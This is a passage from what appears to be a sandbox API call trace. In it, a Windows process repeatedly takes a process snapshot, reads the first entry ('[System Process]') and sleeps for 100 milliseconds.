cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.377] Sleep (dwMilliseconds=0x64) [0215.402] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0215.464] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.527] Sleep (dwMilliseconds=0x64) [0215.529] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0215.543] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.602] Sleep (dwMilliseconds=0x64) [0215.604] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0215.616] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.672] Sleep (dwMilliseconds=0x64) [0215.674] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0215.687] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.743] Sleep (dwMilliseconds=0x64) [0215.744] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0215.763] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.843] Sleep (dwMilliseconds=0x64) [0215.846] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0215.866] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.935] Sleep (dwMilliseconds=0x64) [0215.937] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0215.951] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.016] Sleep (dwMilliseconds=0x64) [0216.017] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0216.031] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.101] Sleep (dwMilliseconds=0x64) [0216.103] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0216.116] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.188] Sleep (dwMilliseconds=0x64) [0216.194] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0216.205] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.263] Sleep (dwMilliseconds=0x64) [0216.268] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0216.281] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.347] Sleep (dwMilliseconds=0x64) [0216.349] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0216.359] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.473] Sleep (dwMilliseconds=0x64) [0216.481] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0216.515] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.582] Sleep (dwMilliseconds=0x64) [0216.584] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0216.676] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.768] Sleep (dwMilliseconds=0x64) [0216.774] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0216.790] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.872] Sleep (dwMilliseconds=0x64) [0216.874] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0216.890] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.987] Sleep (dwMilliseconds=0x64) [0216.990] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0217.005] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.082] Sleep (dwMilliseconds=0x64) [0217.083] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0217.094] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.157] Sleep (dwMilliseconds=0x64) [0217.159] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0217.170] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.225] Sleep (dwMilliseconds=0x64) [0217.244] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0217.255] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.318] Sleep (dwMilliseconds=0x64) [0217.321] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0217.338] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.442] Sleep (dwMilliseconds=0x64) [0217.448] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0217.462] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.540] Sleep (dwMilliseconds=0x64) [0217.542] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0217.559] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.626] Sleep (dwMilliseconds=0x64) [0217.629] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0217.644] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.712] Sleep (dwMilliseconds=0x64) [0217.714] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0217.725] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.779] Sleep (dwMilliseconds=0x64) [0217.781] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0217.806] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.863] Sleep (dwMilliseconds=0x64) [0217.865] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0217.875] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.940] Sleep (dwMilliseconds=0x64) [0217.946] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0217.962] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.041] Sleep (dwMilliseconds=0x64) [0218.043] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0218.054] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.113] Sleep (dwMilliseconds=0x64) [0218.117] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0218.127] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.192] Sleep (dwMilliseconds=0x64) [0218.194] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0218.244] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.320] Sleep (dwMilliseconds=0x64) [0218.323] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0218.333] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.429] Sleep (dwMilliseconds=0x64) [0218.431] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0218.443] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.514] Sleep (dwMilliseconds=0x64) [0218.520] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0218.534] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.598] Sleep (dwMilliseconds=0x64) [0218.601] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0218.611] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.669] Sleep (dwMilliseconds=0x64) [0218.670] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0218.683] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.741] Sleep (dwMilliseconds=0x64) [0218.744] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0218.755] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.815] Sleep (dwMilliseconds=0x64) [0218.817] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0218.830] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.885] Sleep (dwMilliseconds=0x64) [0218.888] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0218.898] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.964] Sleep (dwMilliseconds=0x64) [0218.966] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0218.976] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.090] Sleep (dwMilliseconds=0x64) [0219.092] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0219.102] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.159] Sleep (dwMilliseconds=0x64) [0219.161] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0219.171] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.233] Sleep (dwMilliseconds=0x64) [0219.257] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0219.273] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.338] Sleep (dwMilliseconds=0x64) [0219.340] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0219.354] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.458] Sleep (dwMilliseconds=0x64) [0219.460] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0219.473] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.535] Sleep (dwMilliseconds=0x64) [0219.537] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0219.546] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.606] Sleep (dwMilliseconds=0x64) [0219.608] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0219.617] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.669] Sleep (dwMilliseconds=0x64) [0219.671] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0219.682] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.730] Sleep (dwMilliseconds=0x64) [0219.733] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0219.743] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.793] Sleep (dwMilliseconds=0x64) [0219.795] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0219.804] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.859] Sleep (dwMilliseconds=0x64) [0219.860] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0219.871] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.920] Sleep (dwMilliseconds=0x64) [0219.922] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0219.934] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.993] Sleep (dwMilliseconds=0x64) [0219.996] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0220.009] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.066] Sleep (dwMilliseconds=0x64) [0220.068] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0220.081] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.133] Sleep (dwMilliseconds=0x64) [0220.135] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0220.146] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.194] Sleep (dwMilliseconds=0x64) [0220.196] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0220.281] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.333] Sleep (dwMilliseconds=0x64) [0220.335] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0220.344] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.425] Sleep (dwMilliseconds=0x64) [0220.427] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0220.438] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.511] Sleep (dwMilliseconds=0x64) [0220.512] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0220.526] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.589] Sleep (dwMilliseconds=0x64) [0220.590] 